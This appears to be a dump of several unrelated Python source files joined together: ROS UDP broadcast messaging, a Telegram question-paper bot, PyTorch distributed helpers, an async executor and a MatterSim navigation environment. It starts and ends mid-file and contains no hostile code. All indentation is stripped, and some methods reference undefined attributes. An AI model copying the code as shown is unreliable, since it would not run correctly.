self.topic = UDPSetup(topic_name, data_type)
self.setup_communications()
self.network = self.__make_address(network_address, network_size, self.topic.port)
# Use ready once communication to the master is done, also, update the port
self.ready = True
def setup_communications(self):
self.cs = socket(AF_INET, SOCK_DGRAM)
self.cs.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.cs.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
def __send(self, data):
if data._type == "multimaster_udp/Msg":
buff = StringIO()
data.serialize(buff)
self.cs.sendto(buff.getvalue(), self.network)
else:
# Wrong msg type
pass
def publish(self, rosmsg):
"""
publish(rosmsg)
High level publish of messages
"""
if self.ready:
msg = Msg()
msg.data_type = rosmsg._type
buff = StringIO()
rosmsg.serialize(buff)
msg.data = buff.getvalue()
msg.length = buff.len
self.__send(msg)
def __make_address(self, network_address, network_size, port):
""" __make_address creates a network
adress and returns it in the str format
192.168.1.12/8 returns 192.168.1.255
"""
splitted = list(map(int, network_address.split('.')))  # list() so item assignment also works on Python 3
current = 3
while network_size > 0 and current >= 0:
if network_size >= 8:
splitted[current] = 255
else :
splitted[current] = splitted[current] | (2**network_size-1)
network_size -= 8
current -= 1
return (".".join(map(str, splitted)), port)
class UDPHandlerServer(socketserver.UDPServer):
"""docstring for UDPHandlerServer"""
# IP limitation
max_packet_size = 64000
allow_reuse_address = True
def __init__(self, callback, *args, **kwargs):
socketserver.UDPServer.__init__(self, *args, **kwargs)
self.callback = callback
def finish_request(self, request, client_address):
self.callback(request, client_address)
class UDPSubscriber(object):
"""docstring for UDPSubscriber"""
def __init__(self, topic_name, data_type, callback=None):
self.data_type = data_type
self.topic = UDPSetup(topic_name, data_type)
if callback is None:
self.local_pub = rospy.Publisher(topic_name, data_type, queue_size=10)
else:
self.callback = callback
self.server = UDPHandlerServer(self.__handle_callback, ("0.0.0.0", self.topic.port), socketserver.BaseRequestHandler)
self.t = threading.Thread(target = self.server.serve_forever)
self.t.start()
rospy.on_shutdown(self.shutdown)
def __handle_callback(self, request, client_address):
inmsg = Msg()
inmsg.deserialize(request[0])
if inmsg.data_type == self.topic.data_type:
msg = self.data_type()
msg.deserialize(inmsg.data)
self.callback(msg, self.topic)
# else error or
# Dynamic message loading
# dataClass = get_class(inmsg.data_type)
# msg = dataClass()
def callback(self, msg, topic):
self.local_pub.publish(msg)
def shutdown(self):
self.server.shutdown()
|
qpapers.py
|
import re
import threading
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton
from telegram.chataction import ChatAction
from telegram.error import BadRequest
from telegram.ext.dispatcher import run_async
from Brain.Modules.help import get_help
from Brain.Utils import button_menu, qpaper_utils
from Brain.Utils.dbfuncs import query_collect, command_collect
from Brain.Utils.dbfuncs import user_collect
from Brain.Utils.strings import HELPER_SCRIPTS, COURSES_LIST, SEMS, BRANCHES_COURSE, BASE_URL
from server import logger
qpapers_info_help = \
"""
- /qpapers - Click to get Question Papers \U0001F4C3
"""
HELPER_SCRIPTS['qpapers'] = qpapers_info_help
def course(text):
button_list = []
course = ""
course_in = text[0]
for module, tag in COURSES_LIST.items():
if course_in == tag:
course = module
for branch, branch_code in BRANCHES_COURSE[course].items():
branch_full = branch
nextt = [course_in, branch_code]
button_list.append(
InlineKeyboardButton(
text="{}".format(branch_full),
callback_data="qa={}".format("+".join(nextt)), )
)
colm = 2
word = """Selected Course: `{}` \nSelect Branch :""".format(course)
return button_list, word, colm
def course_branch(text):
button_list = []
colm = 2
course_full = branch_full = ''
course_in, branch_in = text
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branchy, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branchy
break
word = """Selected Course: `{}` \nSelected Branch: `{}` \nSelect Sem :""". \
format(course_full, branch_full)
for sem in range(1, SEMS[course_full] + 1):
nextt = [course_in, branch_in, str(sem)]
button_list.append(
InlineKeyboardButton(
text="{}".format(sem),
callback_data="qa={}".format("+".join(nextt)),
)
)
# back_button data
back_data = "qa={}".format("+".join([course_in]))
return button_list, word, colm, back_data
def course_branch_sem(text):
button_list = []
colm = 1
course_full = branch_full = ''
course_in, branch_in, sem_in = text
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branch, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branch
break
word = """Selected Course: `{}` \nSelected Branch: `{}` \nSelected Sem: `{}` \nSelect Subject :""". \
format(course_full, branch_full, sem_in)
# we don't use 'papers' here just use subs
subs, papers = qpaper_utils.collect_subs_n_papers(course_full, branch_full, sem_in)
pre = [course_in, branch_in, sem_in]
if len(subs) == 0:
word += '\n _Unavailable_ \U0001F615'
query_log = {
'level': 3,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': "",
'available': False
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
else:
for sub in subs:
sub_ = ''.join(sub.split(' '))
callback_str = "qa={}".format('+'.join(pre))
callback_str += "+" + sub_
if len(callback_str) > 64:
logger.error("".join(text) + "=>" + callback_str + "#" + str(len(callback_str)))
callback_str = callback_str[:64]
logger.info("serialized to =>" + callback_str)
button_list.append(
InlineKeyboardButton(
text="{}".format(sub),
callback_data=callback_str,
)
)
# back_button data
back_data = "qa={}".format("+".join([course_in, branch_in]))
return button_list, word, colm, back_data
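# Sketch (assumption, illustrative only): Telegram restricts callback_data to 64 bytes, which is why
# the subject component is truncated above before being packed into "qa=course+branch+sem+subject".
def _clip_callback_data(parts, limit=64, prefix="qa="):
    data = prefix + "+".join(parts)
    return data if len(data) <= limit else data[:limit]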
def course_branch_sem_sub(text):
button_list = []
colm = 1
course_in, branch_in, sem_in, sub_in = text
course_full = branch_full = ''
for module, tag in COURSES_LIST.items():
if course_in == tag:
course_full = module
break
for branch, key in BRANCHES_COURSE[course_full].items():
if branch_in == key:
branch_full = branch
break
subs, papers = qpaper_utils.collect_subs_n_papers(course_full, branch_full, sem_in)
is_avail = False
if len(subs) == 0:
word = '\n _Unavailable_ \U0001F615'
query_log = {
'level': 4,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': sub_in,
'available': False
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
else:
sub_index = None
for sub in subs:
format_callback_sub = ''.join(sub.split(' '))[:53]
# print(repr(format_callback_sub) + " ================ " + repr(sub_in))
# https://stackoverflow.com/questions/17667923/remove-n-or-t-from-a-given-string
# removing \t \n \r when comparing
if re.sub(r'\s+', '', format_callback_sub) == re.sub(r'\s+', '', sub_in):
sub_index = subs.index(sub)
break
papers_for_sub = papers[sub_index].items()
for name, url in papers_for_sub:
button_list.append(
InlineKeyboardButton(
text="{}".format(name),
url=BASE_URL + url,
)
)
word = "Papers for \n`{}`".format(sub_in)
is_avail = True
query_log = {
'level': 4,
'course': course_full,
'branch': branch_full,
'semester': sem_in,
'subject': sub_in,
'available': is_avail
}
threading.Thread(target=query_collect, args=(query_log,), daemon=True).start()
# back_button data
back_data = "qa={}".format("+".join([course_in, branch_in, sem_in]))
return button_list, word, colm, back_data
@run_async
def qpapers_button(update, context):
chat = update.effective_chat
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
query = update.callback_query
logger.info(query.data)
course_match = re.match(r"qa=(.+?)", query.data)
back_button_match = re.match(r"qa_back", query.data)
try:
if course_match:
text = query.data.split('=', 1)[1].split('+')
logger.info(text)
back_data = "qa_back"
if len(text) == 1:
# course selected => select branch
button_list, word, colm = course(text)
elif len(text) == 2:
# course, branch selected => select sem
button_list, word, colm, back_data = course_branch(text)
elif len(text) == 3:
# course, branch, sem selected => select subject
button_list, word, colm, back_data = course_branch_sem(text)
elif len(text) == 4:
# course, branch, sem, subject selected => send the links here
button_list, word, colm, back_data = course_branch_sem_sub(text)
else:
word = "Some Unknown Error\n Use /feedback to send feedback about this error)"
send_qpapers(update, text=word, keyboard=None)
return
# adding back button for easy traversing
footer_button = [InlineKeyboardButton(text="[Back]", callback_data=back_data)]
reply_markup_keyboard = InlineKeyboardMarkup(
button_menu.build_menu(
button_list,
n_cols=colm,
footer_buttons=footer_button
)
)
send_qpapers(update, text=word, keyboard=reply_markup_keyboard)
elif back_button_match:
get_qpapers(update, context)
# ensure no spinning white circle
context.bot.answer_callback_query(query.id)
query.message.delete()
except BadRequest as e:
if e.message == "Message is not modified":
pass
elif e.message == "Query_id_invalid":
pass
elif e.message == "Message can't be deleted":
pass
else:
logger.exception("Exception : %s", str(query.data))
# do not async
def send_qpapers(update, text, keyboard=None):
logger.info("into send_qpapers")
if not keyboard:
pass
update.effective_message.reply_text(text=text, parse_mode=ParseMode.MARKDOWN, reply_markup=keyboard)
@run_async
def get_qpapers(update, context):
logger.info("into get_qpapers")
chat = update.effective_chat
threading.Thread(target=user_collect, args=(chat,), daemon=True).start()
threading.Thread(target=command_collect, args=("qpapers",), daemon=True).start()
context.bot.send_chat_action(chat_id=chat.id, action=ChatAction.TYPING)
# ONLY send help in PM
if chat.type != chat.PRIVATE:
context.args = ['qpapers']
get_help(update, context)
else:
# called default
button_list = []
for module, tag in COURSES_LIST.items():
callback_data = 'qa={}'.format(tag)
text = "{}".format(module)
button_list.append(
InlineKeyboardButton(text=text,
callback_data=callback_data, ))
reply_markup_keyboard = InlineKeyboardMarkup(button_menu.build_menu(button_list, n_cols=2))
send_qpapers(
update=update,
text="Select Course",
keyboard=reply_markup_keyboard
)
|
distributed.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed helpers."""
import multiprocessing
import os
import signal
import threading
import traceback
import torch
from xnas.core.config import cfg
def is_master_proc():
"""Determines if the current process is the master process.
Master process is responsible for logging, writing and loading checkpoints. In
the multi GPU setting, we assign the master role to the rank 0 process. When
training using a single GPU, there is a single process which is considered master.
"""
return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0
def init_process_group(proc_rank, world_size):
"""Initializes the default process group."""
# Set the GPU to use
torch.cuda.set_device(proc_rank)
# Initialize the process group
torch.distributed.init_process_group(
backend=cfg.DIST_BACKEND,
init_method="tcp://{}:{}".format(cfg.HOST, cfg.PORT),
world_size=world_size,
rank=proc_rank,
)
def destroy_process_group():
"""Destroys the default process group."""
torch.distributed.destroy_process_group()
def scaled_all_reduce(tensors):
"""Performs the scaled all_reduce operation on the provided tensors.
The input tensors are modified in-place. Currently supports only the sum
reduction operator. The reduced values are scaled by the inverse size of the
process group (equivalent to cfg.NUM_GPUS).
"""
# There is no need for reduction in the single-proc case
if cfg.NUM_GPUS == 1:
return tensors
# Queue the reductions
reductions = []
for tensor in tensors:
reduction = torch.distributed.all_reduce(tensor, async_op=True)
reductions.append(reduction)
# Wait for reductions to finish
for reduction in reductions:
reduction.wait()
# Scale the results
for tensor in tensors:
tensor.mul_(1.0 / cfg.NUM_GPUS)
return tensors
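# Minimal usage sketch (assumption: the default process group has already been initialised via
# init_process_group when NUM_GPUS > 1): average a scalar loss across workers before logging it.
def _example_scaled_all_reduce(local_loss: float) -> float:
    loss = torch.tensor([local_loss])
    loss = scaled_all_reduce([loss])[0]
    return loss.item()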
class ChildException(Exception):
"""Wraps an exception from a child process."""
def __init__(self, child_trace):
super(ChildException, self).__init__(child_trace)
class ErrorHandler(object):
"""Multiprocessing error handler (based on fairseq's).
Listens for errors in child processes and propagates the tracebacks to the parent.
"""
def __init__(self, error_queue):
# Shared error queue
self.error_queue = error_queue
# Children processes sharing the error queue
self.children_pids = []
# Start a thread listening to errors
self.error_listener = threading.Thread(target=self.listen, daemon=True)
self.error_listener.start()
# Register the signal handler
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
"""Registers a child process."""
self.children_pids.append(pid)
def listen(self):
"""Listens for errors in the error queue."""
# Wait until there is an error in the queue
child_trace = self.error_queue.get()
# Put the error back for the signal handler
self.error_queue.put(child_trace)
# Invoke the signal handler
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, _sig_num, _stack_frame):
"""Signal handler."""
# Kill children processes
for pid in self.children_pids:
os.kill(pid, signal.SIGINT)
# Propagate the error from the child process
raise ChildException(self.error_queue.get())
def run(proc_rank, world_size, error_queue, fun, fun_args, fun_kwargs):
"""Runs a function from a child process."""
try:
# Initialize the process group
init_process_group(proc_rank, world_size)
# Run the function
fun(*fun_args, **fun_kwargs)
except KeyboardInterrupt:
# Killed by the parent process
pass
except Exception:
# Propagate exception to the parent process
error_queue.put(traceback.format_exc())
finally:
# Destroy the process group
destroy_process_group()
def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None):
"""Runs a function in a multi-proc setting (unless num_proc == 1)."""
# There is no need for multi-proc in the single-proc case
fun_kwargs = fun_kwargs if fun_kwargs else {}
if num_proc == 1:
fun(*fun_args, **fun_kwargs)
return
# Handle errors from training subprocesses
error_queue = multiprocessing.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Run each training subprocess
ps = []
for i in range(num_proc):
p_i = multiprocessing.Process(
target=run, args=(i, num_proc, error_queue, fun, fun_args, fun_kwargs)
)
ps.append(p_i)
p_i.start()
error_handler.add_child(p_i.pid)
# Wait for each subprocess to finish
for p in ps:
p.join()
|
async_executor.py
|
import logging
from threading import Lock, Thread
logger = logging.getLogger(__name__)
class AsyncExecutor(object):
def __init__(self):
self._busy = False
self._thread_lock = Lock()
self._scheduled_action = None
self._scheduled_action_lock = Lock()
@property
def busy(self):
return self._busy
def schedule(self, action, immediately=False):
with self._scheduled_action_lock:
if self._scheduled_action is not None:
return self._scheduled_action
self._scheduled_action = action
self._busy = immediately
return None
@property
def scheduled_action(self):
with self._scheduled_action_lock:
return self._scheduled_action
def reset_scheduled_action(self):
with self._scheduled_action_lock:
self._scheduled_action = None
def run(self, func, args=()):
try:
return func(*args) if args else func()
except Exception:
logger.exception('Exception during execution of long running task %s', self.scheduled_action)
finally:
with self:
self._busy = False
self.reset_scheduled_action()
def run_async(self, func, args=()):
self._busy = True
Thread(target=self.run, args=(func, args)).start()
def __enter__(self):
self._thread_lock.acquire()
def __exit__(self, *args):
self._thread_lock.release()
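# Usage sketch (assumption, not part of the original module): schedule a named long-running action,
# then run the real work without blocking the caller; `busy` is reset and the scheduled action is
# cleared once the worker thread finishes.
def _example_async_executor():
    executor = AsyncExecutor()
    if executor.schedule('demo task') is None:  # nothing else was scheduled, we own the slot
        executor.run_async(print, ('running the demo task',))
    return executor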
|
env.py
|
''' Batched Room-to-Room navigation environment '''
import sys
sys.path.append('build')
sys.path.append('../build')
import MatterSim
import csv
import numpy as np
import math
import base64
import utils
import json
import os
import random
import networkx as nx
from param import args
from utils import load_datasets, load_nav_graphs, Tokenizer
import threading
import queue
csv.field_size_limit(sys.maxsize)
from copy import copy, deepcopy
from multiprocessing import Process, Queue
import torch
# class data_fetch_worker(object):
# def __init__(self, io)
class ViewPoint():
def __init__(self,location):
self.viewpointId = location.viewpointId
self.ix = location.ix
# self.x = location.x
# self.y = location.y
# self.z = location.z
self.rel_heading = location.rel_heading
self.rel_elevation = location.rel_elevation
self.rel_distance = location.rel_distance
class State():
def __init__(self, state):
self.scanId = state.scanId
self.location = ViewPoint(state.location)
self.heading = state.heading
self.elevation = state.elevation
self.navigableLocations = self._navigable_locations(state.navigableLocations)
self.viewIndex = state.viewIndex
def _navigable_locations(self, locations):
res = []
for v in locations:
res.append(ViewPoint(v))
return res
class EnvBatch():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features '''
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
for i, sim in enumerate(self.sims):
state = sim.getState()
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id] # Get feature for
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
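# Sketch (assumption, not referenced elsewhere in this file): with discretized viewing angles,
# viewIndex 0-35 encodes 12 relative headings x 3 elevation levels, as described in getStates above;
# this helper recovers the relative heading and elevation in radians.
def _view_index_to_heading_elevation(view_index):
    heading = math.radians(30.0 * (view_index % 12))
    elevation = math.radians(30.0 * ((view_index // 12) - 1))  # -30, 0 or +30 degrees
    return heading, elevation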
class EnvBatch_P():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features
Parallel version
'''
# For now, the agent can't pick which forward move to make - just the one in the middle
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The name of file stored the feature.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict: # A silly way to avoid multiple reading
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.qin = []
self.qout = []
self.qtraj = []
self.feature_states = None
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True) # Set increment/decrement to 30 degree. (otherwise by radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
self.qin.append(Queue())
self.qout.append(Queue())
self.qtraj.append(Queue())
self.pool = []
def function(i, sim, qin, qout, qtraj):
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
while True:
op, x = qin.get()
# while not qout.empty():
# qout.get()
# while not qtraj.empty():
# qtraj.get()
if op == 'act':
select_candidate, src_point, trg_point, src_level, trg_level = x
traj = []
def take_action(i, name):
if type(name) is int: # Go to the next view
sim.makeAction(name, 0, 0)
else: # Adjust
sim.makeAction(*env_actions[name])
state = sim.getState()
traj.append((state.location.viewpointId, state.heading, state.elevation))
while src_level < trg_level: # Tune up
take_action(i, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, 'down')
src_level -= 1
while sim.getState().viewIndex != trg_point: # Turn right until the target
take_action(i, 'right')
assert select_candidate['viewpointId'] == \
sim.getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, select_candidate['idx'])
state = sim.getState()
qout.put((state.scanId, state.location.viewpointId, state.heading, state.elevation))
# print(traj)
qtraj.put(traj)
elif op == 'new':
scanId, viewpointId, heading, elevation = x
sim.newEpisode(scanId, viewpointId, heading, elevation)
elif op == 'state':
state = sim.getState()
state = State(state)
# if name != 'env':
# setattr(env_copy,name,value)
qout.put(state)
for i in range(batch_size):
p = Process(target=function, args=(i, self.sims[i], self.qin[i], self.qout[i], self.qtraj[i]), daemon=True)
p.start()
self.pool.append(p)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.qin[i].put(('new',(scanId, viewpointId, heading, elevation)))
# self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
self.feature_states = self._getStates()
def _getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((30, 2048), sim_state) ] * batch_size
"""
feature_states = []
# for i, sim in enumerate(self.sims):
# state = sim.getState()
# long_id = self._make_id(state.scanId, state.location.viewpointId)
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
for i in range(self.batch_size):
while not self.qout[i].empty():
self.qout[i].get()
while not self.qtraj[i].empty():
self.qtraj[i].get()
self.qin[i].put(('state',None))
for i in range(self.batch_size):
state = self.qout[i].get()
# print(state)
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id]     # Get the precomputed feature for this viewpoint
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getStates(self):
if self.feature_states is None:
self.feature_states = self._getStates()
return self.feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
pool = []
def makeaction(i, env, index, heading, elevation, q):
env.makeAction(index, heading, elevation)
state = env.getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
q.put((i,scanId,viewpointId,heading,elevation))
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
p = Process(target=makeaction, args=(i,self.sims[i],index,heading,elevation,self.q))
p.start()
pool.append(p)
for p in pool:
p.join()
while not self.q.empty():
i, scanId, viewpointId, heading, elevation = self.q.get()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def make_equiv_action(self, a_t, perm_obs, perm_idx=None, traj=None):
if perm_idx is None:
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12  # view indices start at 0; 12 heading slots per elevation level
trg_level = (trg_point ) // 12
self.qin[idx].put(('act',(select_candidate, src_point, trg_point, src_level, trg_level)))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1:
if traj is not None:
res = self.qtraj[idx].get()  # queues are indexed by simulator id, matching the put above
traj[i]['path'] += res
scanId, viewpointId, heading, elevation = self.qout[idx].get()
# idx = perm_idx[i]
# self.sims[idx].newEpisode(scanId, viewpointId, heading, elevation)
self.feature_states = self._getStates()
def copystate(self, env):
for i, sim in enumerate(self.sims):
state = env.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
def copyinstance(self):
env = EnvBatch(self.features, len(self.sims))
for i, sim in enumerate(env.sims):
state = self.sims[i].getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
sim.newEpisode(scanId, viewpointId, heading, elevation)
return env
class EnvBatch_T():
''' A simple wrapper for a batch of MatterSim environments,
using discretized viewpoints and pretrained features
Parallel version: each simulator is driven by a worker thread via per-simulator queues.
'''
# For now, the agent can't pick which forward move to make - just the one in the middle
def __init__(self, feature_store=None, batch_size=100):
"""
1. Load pretrained image feature
2. Init the Simulator.
:param feature_store: The path of the file storing the features, or an already-loaded feature dict.
:param batch_size: Used to create the simulator list.
"""
if feature_store:
if type(feature_store) is dict:    # reuse an already-loaded feature dict instead of re-reading the file
self.features = feature_store
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.feature_size = next(iter(self.features.values())).shape[-1]
# print('The feature size is %d' % self.feature_size)
else:
print('Image features not provided')
self.features = None
self.image_w = 640
self.image_h = 480
self.vfov = 60
self.featurized_scans = set([key.split("_")[0] for key in list(self.features.keys())])
self.sims = []
self.qin = []
self.qout = []
self.qtraj = []
self.feature_states = None
self.batch_size = batch_size
for i in range(batch_size):
sim = MatterSim.Simulator()
sim.setRenderingEnabled(False)
sim.setDiscretizedViewingAngles(True)   # 30-degree increments/decrements (otherwise angles are in radians)
sim.setCameraResolution(self.image_w, self.image_h)
sim.setCameraVFOV(math.radians(self.vfov))
sim.init()
self.sims.append(sim)
self.qin.append(queue.Queue())
self.qout.append(queue.Queue())
self.qtraj.append(queue.Queue())
self.pool = []
def function(i, sim, qin, qout, qtraj):
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
while True:
op, x = qin.get()
# while not qout.empty():
# qout.get()
# while not qtraj.empty():
# qtraj.get()
if op == 'act':
select_candidate, src_point, trg_point, src_level, trg_level = x
traj = []
def take_action(i, name):
if type(name) is int: # Go to the next view
sim.makeAction(name, 0, 0)
else: # Adjust
sim.makeAction(*env_actions[name])
state = sim.getState()
traj.append((state.location.viewpointId, state.heading, state.elevation))
while src_level < trg_level: # Tune up
take_action(i, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, 'down')
src_level -= 1
while sim.getState().viewIndex != trg_point: # Turn right until the target
take_action(i, 'right')
assert select_candidate['viewpointId'] == \
sim.getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, select_candidate['idx'])
state = sim.getState()
qout.put((state.scanId, state.location.viewpointId, state.heading, state.elevation))
# print(traj)
qtraj.put(traj)
elif op == 'new':
scanId, viewpointId, heading, elevation = x
sim.newEpisode(scanId, viewpointId, heading, elevation)
elif op == 'state':
state = sim.getState()
state = State(state)
# if name != 'env':
# setattr(env_copy,name,value)
qout.put(state)
for i in range(batch_size):
p = threading.Thread(target=function, args=(i, self.sims[i], self.qin[i], self.qout[i], self.qtraj[i]), daemon=True)
p.start()
self.pool.append(p)
def _make_id(self, scanId, viewpointId):
return scanId + '_' + viewpointId
def newEpisodes(self, scanIds, viewpointIds, headings, elevations=None):
if elevations is None:
elevations = np.zeros(len(headings))
for i, (scanId, viewpointId, heading, elevation) in enumerate(zip(scanIds, viewpointIds, headings, elevations)):
# print("New episode %d" % i)
# sys.stdout.flush()
self.qin[i].put(('new',(scanId, viewpointId, heading, elevation)))
# self.sims[i].newEpisode(scanId, viewpointId, heading, 0)
self.feature_states = self._getStates()
def _getStates(self):
"""
Get list of states augmented with precomputed image features. rgb field will be empty.
Agent's current view [0-35] (set only when viewing angles are discretized)
[0-11] looking down, [12-23] looking at horizon, [24-35] looking up
:return: [ ((36, 2048), sim_state) ] * batch_size
"""
feature_states = []
# for i, sim in enumerate(self.sims):
# state = sim.getState()
# long_id = self._make_id(state.scanId, state.location.viewpointId)
# if self.features:
# feature = self.features[long_id] # Get feature for
# feature_states.append((feature, state))
# else:
# feature_states.append((None, state))
for i in range(self.batch_size):
while not self.qout[i].empty():
self.qout[i].get()
while not self.qtraj[i].empty():
self.qtraj[i].get()
self.qin[i].put(('state',None))
for i in range(self.batch_size):
state = self.qout[i].get()
# print(state)
long_id = self._make_id(state.scanId, state.location.viewpointId)
if self.features:
feature = self.features[long_id]     # Get the precomputed feature for this viewpoint
feature_states.append((feature, state))
else:
feature_states.append((None, state))
return feature_states
def getStates(self):
if self.feature_states is None:
self.feature_states = self._getStates()
return self.feature_states
def makeActions(self, actions):
''' Take an action using the full state dependent action interface (with batched input).
Every action element should be an (index, heading, elevation) tuple. '''
pool = []
def makeaction(i, env, index, heading, elevation, q):
env.makeAction(index, heading, elevation)
state = env.getState()
scanId = state.scanId
viewpointId = state.location.viewpointId
heading = state.heading
elevation = state.elevation
q.put((i,scanId,viewpointId,heading,elevation))
for i, (index, heading, elevation) in enumerate(actions):
self.sims[i].makeAction(index, heading, elevation)
p = Process(target=makeaction, args=(i,self.sims[i],index,heading,elevation,self.q))
p.start()
pool.append(p)
for p in pool:
p.join()
while not self.q.empty():
i, scanId, viewpointId, heading, elevation = self.q.get()
self.sims[i].newEpisode(scanId, viewpointId, heading, elevation)
def make_equiv_action(self, a_t, perm_obs, perm_idx=None, traj=None):
if perm_idx is None:
perm_idx = range(len(perm_obs))
